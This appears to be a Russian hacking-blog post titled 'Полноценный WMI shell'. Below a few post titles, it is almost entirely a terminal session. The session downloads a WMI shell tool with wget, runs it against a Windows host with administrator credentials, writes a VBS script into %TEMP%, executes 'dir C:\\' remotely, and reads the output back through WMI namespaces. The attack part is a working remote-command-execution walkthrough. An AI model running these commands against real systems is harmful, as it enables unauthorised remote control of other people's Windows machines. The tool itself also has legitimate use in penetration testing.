Сплоетс на миллион
Противодействие фишингу на государственном уровне
penetest VS. APT
[hacking tricks] AVs bypass
[hacking tricks] Полноценный WMI shell
Ознакомиться с презентацией можно по следующей ссылке [тынц].
root@bt:/tmp# wget https://www.lexsi.fr/conference/wmi-shell.zip
root@bt:/tmp# unzip wmi-shell.zip
Archive: wmi-shell.zip
creating: wmi-shell/
inflating: wmi-shell/LICENSE
inflating: wmi-shell/wmi-shell.py
inflating: wmi-shell/README
inflating: wmi-shell/base.vbs
creating: wmi-shell/bin/
inflating: wmi-shell/bin/base64.c
inflating: wmi-shell/bin/base64.exe
inflating: wmi-shell/bin/wmis
inflating: wmi-shell/bin/wmic
creating: wmi-shell/b64-source/
inflating: wmi-shell/b64-source/base64.exe
inflating: wmi-shell/b64-source/base64.c
root@bt:/tmp# cd wmi-shell/
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134
Sending our VBS script to 10.1.37.134 ETA: ~6.4 seconds.
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
...
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
>>> dir C:\\
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"dir C:\\\"" 2>/dev/null <-- . Returned code: 1
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
waiting for command output . . Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
. done !
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'EVILTAG%'" > bSKFiy5.tmp <-- . Returned code: 0
Volume in drive C has no label.
Volume Serial Number is 8E25-9E63
Directory of C:\
14.07.2009 07:20 <DIR> PerfLogs
19.04.2014 03:12 <DIR> Program Files
19.04.2014 22:04 <DIR> Program Files (x86)
19.04.2014 03:05 <DIR> Users
20.04.2014 04:19 <DIR Windows
0 File(s) 0 bytes
5 Dir(s) 82▒326▒290▒432 bytes free
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"cleanup\"" 2>/dev/null <-- . Returned code: 1
>>>